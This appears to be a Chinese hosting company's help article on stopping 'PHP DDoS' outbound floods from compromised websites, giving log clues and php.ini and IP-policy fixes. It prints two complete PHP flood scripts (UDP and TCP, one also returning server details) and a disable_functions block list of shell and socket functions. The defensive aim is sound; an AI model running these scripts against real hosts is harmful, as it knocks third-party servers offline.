香港虚拟主机
本站公告
新闻资讯
虚拟主机帮助
域名帮助
服务器帮助
邮箱帮助
建站帮助
网站推广帮助
VPS帮助
特色主机帮助
网站备案专题
会员帮助信息
代理帮助信息
成功案例
我司获香港虚拟主机排行榜十…
香港虚拟主机金秋促销活动正…
百度整治给SEO带来了新的希望
百度同时收录网站带WWW和不带…
百度对原创内容的判断标准 如…
如何建设网站 网站建设三步曲
如何挑选老域名 老域名有那些…
域名常见故障与分析
虚拟主机基本参数介绍
交换链接的技巧 谈一下选择交…
您现在的位置: 江南数联 >> 帮助中心 >> 服务器帮助 >> 正文

php发包如何处理 PHPDDOS发包终极解决方法

  作者:admin    来源:本站原创    点击次数:29     更新时间:2012-9-27 6:37:38  
     
 
关注石头有礼
 
 

php发包如何处理 PHPDDOS发包终极解决方法

PHP由于简单易用,占用系统资源低,速度快在,安全性远远高于ASP在互联网网页设计中得到广泛应用,特别是近几年使用率越来越高,国内几乎所有的知名开源程序都无一例外的使用了PHP+MYSQL环境,特别是PHP可在WIN和LX多种不同操作系统上应用,已经成为很多站长的首选开发环境.但在近一二年来PHP存在的一个致命问题就是PHP发包,我们俗称PHPDDOS他是通过PHP对外调用端口攻击其它服务器,使网站服务器产生很大的流量.

PHPDoS发包表现特点和代码分析

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.
近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
如何快速找到这些站?
你可以打开日志
C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,
里面有类似这样的记录:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
最后三项 783 Disabled 30_FreeHost_1
783就是这个站在IIS中的ID
30_FreeHost_1就是所在池

以下是PHP常见代码,他是通过php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();
print \"Flooded: $ip on port $rand

\";
$max_time = $time+$exec_time;


for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with

$packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \".

round($packets/$exec_time, 2) . \" packets/s \\n\";
?>


上面说了PHP发包的原理和代码分析现在就讲一下如何解决,下面就是关于PHPDDOS发包攻击别人服务器的终极解决方案.

以往我们解决都是直接关掉UDP对外调用端口,但这种方法往往会造成有些PHP特别是需要调用外部数据的PHP程序无法运行,如DZ论坛的云平台,淘宝客等网站就会无法运行,显示为空白,所以经过我们多次的试验今天为大家讲的是一种全新的处理方法,也叫PHP对外发包攻击别人IP最终解决处理办法,详细步骤如下:
一:早期解决办法:
1.按上述找到这个网站后停止它.或停止池,并重启IIS.

2.在IP策略,或防火墙中,禁止所有udp向外发送

在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包。下载这个包,之后导入安全策略。但这个策略并没有关闭DNS端口,部分攻击还是有效.
二:最新终极解决处理办法:

为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址 "特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8" 保存后就行了 )

在2011-4-27,我们上传了新的安全包,里面有一个"星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec"文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)


3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)

4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS

ignore_user_abort = On
(注意前面的;号要删除)

disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,

chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上

fsockopen,set_time_limit

但这样会造成很多php程序都不正常.

另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?


2011-10-22
近期已有新的基于TCP攻击的PHPDDOS代码如下:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$packets = 64;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".

php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
exit;
}
$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time or $exec_time != 69){
break;
}
$fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);
}
?>
同样,可以采有以下解决办法:

1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS

ignore_user_abort = On
(注意前面的;号要删除)

disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,

multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上

fsockopen,set_time_limit

但这样会造成很多php程序都不正常.

2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上。

3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它。


通过以上的处理我相信PHP对包发包的问题可以得到完全解决,我司的服务器经过上面的设置后就在也没有出现过PHPDDOS攻击发包了.

本章关健词:江南数联 域名注册 海外虚拟主机 G享虚拟主机 国内虚拟主机 企业邮箱 网站建设 自助建站 400电话申请 微聚商

 
  版权申请:php发包如何处理 PHPDDOS发包终极解决方法出自江南数联dns06.com未经授权请勿转载!  
 
  • 上一篇帮助:

  • 下一篇帮助:
  •  
         

    扫一扫关注公众号有礼
    Copyright@2004-2015 江南数联 版权所有未经授权请勿复制!
    《中华人民共和国增值电信业务经营许可证》ISP证编号:皖B2-20080036 湘B2-20160056
    公司全称:永州石头网络技术有限公司(运营部)
    地址: 中国·湖南省永州市育才路158号 服务热线:400 616 9260
    安徽公司:安徽仁科信息技术有限公司 地址:合肥万和新城广场A-608 
    关注词:网站空间虚拟空间空间域名域名空间域名主机网站空间哪家好网站空间多少钱